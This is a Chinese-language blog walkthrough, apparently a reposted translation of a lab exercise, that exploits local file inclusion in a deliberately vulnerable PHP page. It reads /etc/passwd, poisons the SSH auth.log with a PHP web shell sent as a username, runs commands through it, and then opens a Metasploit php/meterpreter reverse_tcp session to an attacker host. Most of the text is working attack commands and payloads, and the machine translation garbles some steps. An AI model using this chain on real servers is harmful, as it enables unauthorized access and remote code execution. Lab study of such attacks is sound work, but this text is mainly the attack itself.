攻击者:Kali Linux 目标:Ubuntu
创建一个PHP文件,允许用户通过文件参数包含文件。因此,使用文件参数,我们可以执行一个包含恶意代码的文件,使未经授权的访问是目标PC。从这里下载文件
我就用下方的文本文件里的PHP代码给出 lfi.php 并保存在桌面上。
现在用户以“root”身份登录,并在/var/www/html内创建一个文件夹“lfi”
cd/var/www/html
mkdir lfi
使用下面的命令将lfi.php 文件从桌面移动 到/ var / www / html。
mv /home/raj/Desktop/lfi.php
由于我们已经在/ var / www / html中添加了一个包含include函数的php文件,允许通过它读取另一个文件的内容,并且可能导致LFI攻击。让我们通过构造URL来读取密码文件:
本地主机/LFI/lfi.php?文件=/etc/passwd文件
从给定的图像,你可以观察到上面的URL已经读取到下面的结果如下所示。
在您的kali Linux中打开终端并 通过SSH服务连接目标
ssh user@192.168.1.129
从截图中可以看到我与目标系统连接。
键入以下命令查看其日志:
tail -f /var/log/auth.log
从下面的图片你可以检查auth.log文件的生成日志的详细信息。
现在我将尝试在浏览器上通过lfi.php打开auth.log日志文件,因此授予对auth.log的读写权限。
cd/var/log/
chmod 775 auth.log
现在将auth.log文件包含为文件参数,并在浏览器内提供以下URL。
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log
从给定的图像,你可以看到它也显示在浏览器中创建的身份验证日志。
由于auth.log文件会在我们尝试连接到Web服务器时为每次成功都生成日志,并失败登录尝试。现在利用这个功能,我会发送恶意PHP代码 作为假用户,它会自动添加到auth.log文件作为新的日志。
ssh ' <?php system($ _ GET ['c']); ?>'@ 192.168.1.129
当你再次检查它的日志时,你会发现PHP代码已经被添加为新的日志。
键入以下命令查看其日志:
tail -f /var/log/auth.log
这里它将转储auth日志的数据以及执行通过cmd给出的注释; 现在执行 ifconfig 作为cmd注释来验证网络接口,并在给定的屏幕截图中确认其结果。
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=ifconfig
如果您在任何Web应用程序中发现此类漏洞,则可以使用metasploit平台来利用Web服务器。
use exploit/multi/script/web_delivery msf exploit (web_delivery)>set target 1 msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.123 msf exploit (web_delivery)>set srvport 8081 msf exploit (web_delivery)>exploit
复制 下面窗口中显示 的 高亮文本
将上面 复制的恶意代码粘贴到 URL中,如图所示,并将 其 作为命令执行。
当上面的代码得到执行时,您将获得目标Web服务器的meterpreter会话1。
msf exploit (web_delivery)>sessions 1 meterpreter> sysinfo
本文作者为Mr.Wu,转载请注明,尊守博主劳动成果!
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,thank you !